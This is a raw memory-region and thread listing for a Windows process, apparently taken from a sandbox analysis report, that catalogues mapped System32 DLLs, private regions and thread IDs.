start_va = 0x7fff93290000 end_va = 0x7fff932a7fff entry_point = 0x7fff93290000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 4668 start_va = 0x7fff932b0000 end_va = 0x7fff932c3fff entry_point = 0x7fff932b0000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 4669 start_va = 0x7fff93790000 end_va = 0x7fff9379dfff entry_point = 0x7fff93790000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4670 start_va = 0x7fff938b0000 end_va = 0x7fff9393cfff entry_point = 0x7fff938b0000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 4671 start_va = 0x7fff93f50000 end_va = 0x7fff93faefff entry_point = 0x7fff93f50000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 4672 start_va = 0x7fff94c20000 end_va = 0x7fff94c37fff entry_point = 0x7fff94c20000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 4673 start_va = 0x7fff94e00000 end_va = 0x7fff94e09fff entry_point = 0x7fff94e00000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4674 start_va = 0x7fff95260000 end_va = 0x7fff9527cfff entry_point = 0x7fff95260000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4675 start_va = 0x7fff95940000 end_va = 0x7fff95a15fff entry_point = 0x7fff95940000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4676 start_va = 0x7fff96880000 end_va = 0x7fff96899fff entry_point = 0x7fff96880000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4677 start_va = 0x7fff97bb0000 end_va = 0x7fff97bc5fff entry_point = 0x7fff97bb0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4678 start_va = 0x7fff97c70000 end_va = 0x7fff97c7bfff entry_point = 0x7fff97c70000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 4679 start_va = 0x7fff983f0000 end_va = 0x7fff98418fff entry_point = 0x7fff983f0000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 4680 start_va = 0x7fff98590000 end_va = 0x7fff98733fff entry_point = 0x7fff98590000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 4681 start_va = 0x7fff98be0000 end_va = 0x7fff98c59fff entry_point = 0x7fff98be0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4682 start_va = 0x7fff99270000 end_va = 0x7fff9927afff entry_point = 0x7fff99270000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4683 start_va = 0x7fff99290000 end_va = 0x7fff992c7fff entry_point = 0x7fff99290000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4684 start_va = 0x7fff99320000 end_va = 0x7fff99337fff entry_point = 0x7fff99320000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4685 start_va = 0x7fff9a560000 end_va = 0x7fff9a586fff entry_point = 0x7fff9a560000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4686 start_va = 0x7fff9ab10000 end_va = 0x7fff9ab32fff entry_point = 0x7fff9ab10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4687 start_va = 0x7fff9b0b0000 end_va = 0x7fff9b0e2fff entry_point = 0x7fff9b0b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4688 start_va = 0x7fff9b200000 end_va = 0x7fff9b2a7fff entry_point = 0x7fff9b200000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4689 start_va = 0x7fff9b400000 end_va = 0x7fff9b45cfff entry_point = 0x7fff9b400000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4690 start_va = 0x7fff9b460000 end_va = 0x7fff9b476fff entry_point = 0x7fff9b460000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4691 start_va = 0x7fff9b5d0000 end_va = 0x7fff9b5dafff entry_point = 0x7fff9b5d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4692 start_va = 0x7fff9ba10000 end_va = 0x7fff9ba37fff entry_point = 0x7fff9ba10000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4693 start_va = 0x7fff9ba40000 end_va = 0x7fff9baaafff entry_point = 0x7fff9ba40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4694 start_va = 0x7fff9bab0000 end_va = 0x7fff9bb47fff entry_point = 0x7fff9bab0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4695 start_va = 0x7fff9bbf0000 end_va = 0x7fff9bbfefff entry_point = 0x7fff9bbf0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4696 start_va = 0x7fff9bc00000 end_va = 0x7fff9bc12fff entry_point = 0x7fff9bc00000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4697 start_va = 0x7fff9bc40000 end_va = 0x7fff9bc89fff entry_point = 0x7fff9bc40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4698 start_va = 0x7fff9c660000 end_va = 0x7fff9c6a3fff entry_point = 0x7fff9c660000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4699 start_va = 0x7fff9c6b0000 end_va = 0x7fff9c88cfff entry_point = 0x7fff9c6b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4700 start_va = 0x7fff9c8f0000 end_va = 0x7fff9c995fff entry_point = 0x7fff9c8f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4701 start_va = 0x7fff9c9a0000 end_va = 0x7fff9ca4cfff entry_point = 0x7fff9c9a0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4702 start_va = 0x7fff9e040000 end_va = 0x7fff9e180fff entry_point = 0x7fff9e040000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4703 start_va = 0x7fff9e190000 end_va = 0x7fff9e2ddfff entry_point = 0x7fff9e190000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4704 start_va = 0x7fff9e440000 end_va = 0x7fff9e447fff entry_point = 0x7fff9e440000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4705 start_va = 0x7fff9e450000 end_va = 0x7fff9e575fff entry_point = 0x7fff9e450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4706 start_va = 0x7fff9e580000 end_va = 0x7fff9e7fbfff entry_point = 0x7fff9e580000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4707 start_va = 0x7fff9e870000 end_va = 0x7fff9e90cfff entry_point = 0x7fff9e870000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4708 start_va = 0x7fff9ed80000 end_va = 0x7fff9eddafff entry_point = 0x7fff9ed80000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4709 start_va = 0x7fff9ede0000 end_va = 0x7fff9ee9dfff entry_point = 0x7fff9ede0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4710 start_va = 0x7fff9eeb0000 end_va = 0x7fff9ef18fff entry_point = 0x7fff9eeb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4711 start_va = 0x7fff9ef20000 end_va = 0x7fff9f0a4fff entry_point = 0x7fff9ef20000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4712 start_va = 0x7fff9f110000 end_va = 0x7fff9f1b4fff entry_point = 0x7fff9f110000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4713 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4736 start_va = 0x7fff8b590000 end_va = 0x7fff8b5a1fff entry_point = 0x7fff8b590000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 4866 start_va = 0x4d3c00000 end_va = 0x4d3c00fff entry_point = 0x4d3c00000 region_type = mapped_file name = "config-10a9" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\Fonts\\Config-10A9" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\fonts\\config-10a9") Region: id = 4867 start_va = 0x4d6950000 end_va = 0x4d69cffff entry_point = 0x0 region_type = private name = "private_0x00000004d6950000" filename = "" Region: id = 4868 start_va = 0x7ff70e798000 end_va = 0x7ff70e799fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e798000" filename = "" Region: id = 4869 start_va = 0x7fff96030000 end_va = 0x7fff96065fff entry_point = 0x7fff96030000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Thread: id = 558 os_tid = 0xac4 Thread: id = 559 os_tid = 0x2dc Thread: id = 560 os_tid = 0x70c Thread: id = 561 os_tid = 0x708 Thread: id = 562 os_tid = 0x6f4 Thread: id = 563 os_tid = 0x6d8 Thread: id = 564 os_tid = 0x6c4 Thread: id = 565 os_tid = 0x6c0 Thread: id = 566 os_tid = 0x6bc Thread: id = 567 os_tid = 0x6b8 Thread: id = 568 os_tid = 0x6ac Thread: id = 569 os_tid = 0x594 Thread: id = 570 os_tid = 0x58c Thread: id = 571 os_tid = 0x568 Thread: id = 572 os_tid = 0x544 Thread: id = 573 os_tid = 0x438 Thread: id = 574 os_tid = 0x230 Thread: id = 575 os_tid = 0x1dc Thread: id = 576 os_tid = 0x188 Thread: id = 577 os_tid = 0xfc Thread: id = 578 os_tid = 0x3fc Thread: id = 579 os_tid = 0x3f8 Thread: id = 580 os_tid = 0x3ec Thread: id = 581 os_tid = 0x38c Thread: id = 588 os_tid = 0xc7c